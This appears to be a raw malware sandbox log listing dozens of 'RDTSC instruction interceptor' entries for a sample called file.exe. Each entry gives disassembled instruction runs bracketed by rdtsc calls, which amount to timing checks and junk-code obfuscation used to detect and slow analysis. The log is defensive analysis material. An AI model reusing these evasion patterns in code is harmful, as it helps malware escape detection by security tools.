                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974875 second address: 97487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97487B second address: 974886 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9736AB second address: 9736B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973811 second address: 973818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973818 second address: 973821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973821 second address: 97382B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973965 second address: 973969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973969 second address: 973985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FFBC91A3BD6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973C81 second address: 973C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973C95 second address: 973C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973C99 second address: 973CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FFBC8B2DA9Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pushad 0x0000001c js 00007FFBC8B2DA96h 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007FFBC8B2DAA5h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push ebx 0x0000002d jng 00007FFBC8B2DA96h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9740FB second address: 974101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974101 second address: 97412B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 popad 0x0000000a jmp 00007FFBC8B2DAA3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB7B3 second address: 8FB7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB7B7 second address: 8FB7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB7BD second address: 8FB7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FFBC91A3BD6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB7CD second address: 8FB7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9746DD second address: 9746F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97840A second address: 97843C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FFBC8B2DA96h 0x0000000f jmp 00007FFBC8B2DAA5h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A79 second address: 946A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946FA5 second address: 946FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DA9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946FB4 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007FFBC91A3BDCh 0x00000010 push dword ptr [ebp+122D0595h] 0x00000016 push ecx 0x00000017 xor dword ptr [ebp+122D23F0h], edi 0x0000001d pop edi 0x0000001e call dword ptr [ebp+122D1DD7h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D189Fh], edi 0x0000002b xor eax, eax 0x0000002d jmp 00007FFBC91A3BE0h 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D189Fh], esi 0x0000003c mov dword ptr [ebp+122D39AAh], eax 0x00000042 jmp 00007FFBC91A3BDCh 0x00000047 jmp 00007FFBC91A3BE7h 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007FFBC91A3BE9h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FFBC91A3BE6h 0x0000005f clc 0x00000060 lodsw 0x00000062 stc 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 clc 0x00000068 mov ebx, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D189Fh], edx 0x00000072 nop 0x00000073 push esi 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9470B3 second address: 9470CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FFBC8B2DA96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jl 00007FFBC8B2DAA8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9470CC second address: 9470D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9470D0 second address: 9470D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947220 second address: 94725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnp 00007FFBC91A3BE9h 0x00000011 jmp 00007FFBC91A3BE3h 0x00000016 jnc 00007FFBC91A3BDCh 0x0000001c jno 00007FFBC91A3BD6h 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push ecx 0x00000026 pushad 0x00000027 jc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9473A6 second address: 9473F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007FFBC8B2DA9Ch 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FFBC8B2DAA0h 0x0000001f mov bl, C3h 0x00000021 popad 0x00000022 ja 00007FFBC8B2DA96h 0x00000028 popad 0x00000029 nop 0x0000002a push ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9473F9 second address: 94741D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94741D second address: 947421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947421 second address: 947425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947599 second address: 9475AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DA9Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947A38 second address: 947A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947A3C second address: 947A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947DD8 second address: 947DDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947DDE second address: 9225B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FFBC8B2DAADh 0x00000010 push edx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FFBC8B2DA98h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 call dword ptr [ebp+122D2727h] 0x00000038 jno 00007FFBC8B2DAB0h 0x0000003e push esi 0x0000003f jng 00007FFBC8B2DA9Eh 0x00000045 push edi 0x00000046 pop edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97885B second address: 978861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9789CC second address: 9789D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9789D2 second address: 9789D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9789D8 second address: 9789E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFBC8B2DA96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978B4C second address: 978B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978C9A second address: 978CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FFBC8B2DA98h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 jnl 00007FFBC8B2DA96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978F7F second address: 978FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBC91A3BE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFBC91A3BDCh 0x00000011 jng 00007FFBC91A3BEEh 0x00000017 jmp 00007FFBC91A3BE8h 0x0000001c pushad 0x0000001d jmp 00007FFBC91A3BE4h 0x00000022 jmp 00007FFBC91A3BE4h 0x00000027 jnc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979174 second address: 97917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97917B second address: 9791AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FFBC91A3BD8h 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9791AA second address: 9791AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984F19 second address: 984F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE7h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984F3C second address: 984F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D4E second address: 983D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D54 second address: 983D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D58 second address: 983D6C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FFBC91A3BF1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D6C second address: 983D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D8E second address: 983D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D93 second address: 983D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D99 second address: 983D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9841C5 second address: 9841CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9841CB second address: 9841E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984639 second address: 984640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984C08 second address: 984C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984C0C second address: 984C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DA9Ch 0x0000000c jl 00007FFBC8B2DA96h 0x00000012 jmp 00007FFBC8B2DAA9h 0x00000017 jmp 00007FFBC8B2DAA0h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984C55 second address: 984C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDEh 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989570 second address: 98957C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98957C second address: 989586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8B4 second address: 98B8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8BA second address: 98B8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDBh 0x00000017 je 00007FFBC91A3BD6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8DD second address: 98B8E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8E7 second address: 98B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990868 second address: 99086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FCFB second address: 98FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FCFF second address: 98FD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9902B0 second address: 9902D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 push ebx 0x0000000a jnl 00007FFBC91A3BD6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990437 second address: 990451 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFBC8B2DA9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9959A7 second address: 9959AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9959AD second address: 9959C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995C0B second address: 995C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995C11 second address: 995C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995C15 second address: 995C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947842 second address: 9478C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+1248882Fh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FFBC8B2DA98h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push eax 0x0000002d mov dh, 6Ch 0x0000002f pop ecx 0x00000030 add eax, ebx 0x00000032 stc 0x00000033 push eax 0x00000034 jmp 00007FFBC8B2DAA5h 0x00000039 mov dword ptr [esp], eax 0x0000003c mov cx, 1A12h 0x00000040 push 00000004h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FFBC8B2DA98h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 js 00007FFBC8B2DA96h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996AF3 second address: 996AF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996AF8 second address: 996B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FFBC8B2DA9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996B05 second address: 996B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9994CA second address: 9994D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997FE second address: 999809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A12EE second address: 9A12F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFBC8B2DA96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A12F8 second address: 9A132F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FFBC91A3BD6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A132F second address: 9A1354 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC8B2DA96h 0x00000008 js 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007FFBC8B2DAA0h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1354 second address: 9A135C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A135C second address: 9A1360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
